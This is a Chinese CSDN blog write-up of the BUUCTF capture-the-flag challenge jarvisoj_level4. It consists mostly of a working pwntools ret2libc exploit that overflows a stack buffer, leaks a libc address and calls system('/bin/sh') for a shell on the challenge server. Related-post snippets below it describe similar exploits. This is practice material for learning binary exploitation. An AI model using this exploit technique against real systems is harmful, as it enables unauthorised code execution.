jarvisoj_level4

于 2021-12-09 22:45:06 发布
阅读量208 收藏
点赞数
分类专栏: buuctf 题目 文章标签: linux centos 运维 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/121845917
版权

jarvisoj_level4

查看保护
请添加图片描述
请添加图片描述
32位下的ret2libc。

from pwn import *

context(arch='i386', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27334)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']

p1 = b'a' * (0x88 + 4) + p32(write_plt) + p32(main_addr)
p1 += p32(1) + p32(write_got) + p32(4)
r.sendline(p1)

write_addr = u32(r.recv(4))

libc = ELF('libc-2.23.so')
libc_base = write_addr - libc.sym['write']

system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search(b'/bin/sh').__next__()

p2 = b'a' * (0x88 + 4) + p32(system_addr) + p32(0) + p32(bin_sh)
r.sendline(p2)

r.interactive()
z1r0.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 397
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
Low_Level_IO
02-11
2020年计算机体系结构和汇编语言组合项目阅读Proj6_Morrowj2.asm以获得代码该程序获取10个带符号的32位整数,进行验证并将其从ASCII转换为SDWORD,然后在转换回ASCII以及求和和舍入平均后,显示SDWORDS数组。
Jarvis OJ Level4
qq_39153421的博客
09-19 375
写在最前面:  在漏洞利用的时候,如果没有给出libc库,可以先泄漏两个函数的地址,然后再去查libc的版本号。但是,这种有时候可能失效。现在利用DynELF工具来泄漏system函数的地址,然后再往一个地方写’/bin/sh’字符串并构造调用system函数的栈。下面以Jarvis OJ中的level4这道题为例,使用DynELF实现漏洞利用。   在写之前先了解...
[BUUCTF]PWN--------jarvisoj_level4
BangSen1的博客
04-02 305
jarvisoj_level4 例行检查,32位,开启NX保护 运行一下 用IDA打开。查看主函数 查看vulnerable_function()函数 buf存在溢出漏洞。 是一道ret2libc类型的题目。 利用第一次溢出泄露libc版本,从而获取system函数和"/bin/sh"的地址,并且返回重新执行主函数。 再利用第二次栈溢出跳转执行system("/bin/sh") from pwn import * from LibcSearcher import * context(os = "
[BUUCTF-pwn]——cmcc_pwnme1
Y_peak的博客
03-09 423
[BUUCTF-pwn]——cmcc_pwnme1 题目地址:https://buuoj.cn/challenges#cmcc_pwnme1 先checksec一下,什么保护都没有开,嘶 在IDA中 看完之后,相信大家和我一样.就这??? 思路很清晰, 选择5,进入getfruit,利用栈溢出.修改返回地址为 getflag 结果, 没有这个文件, 搞笑呀 不过可以栈溢出, 我们可以利用ret2libc来解决 思路 通过栈溢出,循环调用. 第一次利用栈溢出leek出地址, 找到libc计算偏移找
Level_Set.zip_level set_level-set_set
07-15
这个"Level Set.zip_level set_level-set_set"压缩包文件包含了一个名为"Level_Set.m"的MATLAB程序,用于执行Level Set算法。 Level Set方法的核心思想是将图像中的边界或形状表示为一个零水平集(level set)函数...
level_set_image.rar_level set_level set 方程
09-21
4. 重构边界:由于Level Set方法可能导致φ函数的宽度变宽,需要通过重初始化或重新嵌入来保持其厚度恒定。 5. 分割结果:φ函数的零交叉点对应于图像的分割边界。 总的来说,Level Set方法提供了一种强大的工具,...
five_level_inverter.rar_CMLI_5level_harmonics inverter
07-15
1. “switching_angles_5_level.asv”、“switching_angles_5_level_final.asv”、“switching_angles_5_level_4_8_08.asv”、“switching_angles_5_level1.asv”:这些文件可能包含了不同版本的五电平逆变器开关角...
LRVOSUN.rar_level set_level set model
07-14
A new level set model without initialization, very time effi
pwnme1题目
09-30
pwnme1的题目,这个是一个简单的栈溢出的题目
pwnme2题目
10-14
cmcc搞的ctf的pwnme2题目的文件,感兴趣的同学可以下载来玩玩
psm.rar_5 LEVEL_level inverter_psim
09-20
标题"psm.rar_5 LEVEL_level inverter_psim"指的是一个关于5级逆变器的仿真项目,其中"5_LEVEL"强调了其多电平特性,"level inverter"是5级逆变器的英文表述,而"psim"则表明这个项目是使用PSIM(Power System ...
three_level_PWM.rar_multilevel_inverter_three level
07-14
本压缩包文件“three_level_PWM.rar”主要探讨的是三电平逆变器的PWM(脉宽调制)技术,特别是一种称为三电平钳位逆变器的结构,以及如何在Simulink/Matlab环境中进行仿真。 首先,我们要理解什么是三电平逆变器。...
Matlab_system_level_simualtion.zip_system level
07-14
system level simulation using matlab
jarvis oj level4
发蝴蝶和大脑斧的博客
12-05 594
与level3相比没有提供libc.so文件。学习使用Dynelf: def leak(address):
jarvisoj——[XMAN]level4
王嘟嘟的博客
07-19 414
题目 Wp 检查基础项,有NX保护 ida看的时候还是之前的那种,但是没有给lib,需要自己去找 那么这里第一步,肯定是找到system的地址 第二步将/bin/sh写入bss字段 第三部调用即可
Jarvis Oj Pwn 学习笔记-level4
baoan4763的博客
05-31 188
没有libc?!DynELF了解一下 来,链接: https://files.cnblogs.com/files/Magpie/level4.rar nc pwn2.jarvisoj.com 9880 我抽着差不多的烟,又check差不多的sec: 扔进IDA: 和level3差不多,只是这道题没有提供libc 这道题其实主要就是学一下pwntools的一个工...
[BUUCTF-pwn]——jarvisoj_level4
Y_peak的博客
02-22 204
[BUUCTF-pwn]——jarvisoj_level4 点我看 write up exploit from pwn import * from LibcSearcher import * p = remote("node3.buuoj.cn",26929) elf = ELF("./level4") write_plt = elf.plt['write'] write_got = elf.got['write'] main_addr = elf.sym['main'] payload = 'a' *
jarvisoj_level0
最新发布
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值